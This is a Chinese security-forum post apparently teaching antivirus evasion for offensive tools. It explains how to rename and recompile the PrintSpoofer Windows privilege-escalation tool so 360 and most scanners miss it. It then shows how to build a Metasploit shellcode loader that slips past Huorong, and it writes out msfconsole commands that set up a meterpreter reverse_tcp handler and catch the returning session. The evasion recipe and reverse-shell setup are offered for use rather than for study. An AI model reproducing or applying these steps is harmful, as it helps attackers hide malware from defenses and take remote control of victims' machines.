用户
搜索
  • TA的每日心情
    开心
    4 天前
  • 签到天数: 21 天

    连续签到: 1 天

    [LV.4]经常看看II

    i春秋-脚本小子

    Rank: 2

    6

    主题

    9

    帖子

    383

    魔法币
    收听
    0
    粉丝
    1
    注册时间
    2019-11-4
    发表于 2021-5-21 17:56:59 0801
    一、PrintSpoofer免杀
            Windows 10 和 Windows Service 2016/2019 提权工具,现在主流的提供工具之一,360 安全会自动查杀,其他杀毒软件并不会查杀,往后可能更多的防护软件会对其进行拦截查杀。
    对其进行源码免杀,首先下载源码 https://github.com/whojeff/PrintSpoofer
    用 vs2019 选择 release x64
    编译,执行后发现之前的360安全卫士会报毒
    免杀思路
    1、将PrintSpoofer.cpp 里面的输出帮助文档全部清空
    2、将项目中搜索PrintSpoofer替换为其他内容,这里改成c1ay,
    3、然后将PrintSpoofer.cpp PrintSpoofer.h 全改为其他名字 这里改成c1ay
    4、添加ico图标即可。
    导入图标后,选择Release模式,右键编译文件。
    文件成功生成。
    将生成的文件放到在线杀毒网站查杀。
    可以看到国内大部分杀软都不会对该文件进行查杀。
    也可以发现世界上的大部分杀软也可以过。
    执行该工具,发现360也不会有任何提示。

    二、MSF 用加载器免杀过火绒
            metasploit 是一款开源的安全漏洞检测工具,同时 Metasploit 是免费的工具,因此安全工作人员常用 Metasploit 工具来检测系统的安全性。Metasploit Framework (MSF) 在 2003 年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。其中攻击载荷模块(Payload) ,在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且Metasploit 还有编码器模块(Encoders),生成后门前,对其进行编码转换,可以混淆绕过一部分杀毒软件。
    64 位免杀编译免杀
    工具 Dev-Cpp 5.11 TDM-GCC 4.9.2 Setup
    文件->新建项目->consoleApplication->c 项目
    修改文件 把 winsock2.h 移动到 windows.h 上 不然编译会出错
    这四行的数字做一些更改
    编译设置 加上 -static-libgcc -lws2_32
    点击编译即可。
    编译完成后选择火绒进行查杀。
    但是该方法过不了360全家桶。
    现在用在线杀软网站进行检测,可以发现大部分杀毒软件都可以绕过。
    在metasploit中开启监听。
    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    msf exploit(handler) > set LPORT 6655
    msf exploit(handler) > set LHOST 192.168.0.101
    msf exploit(handler) > exploit -j
    然后在命令行执行木马。
    可以看到会话成功反弹



    发新帖
    您需要登录后才可以回帖 登录 | 立即注册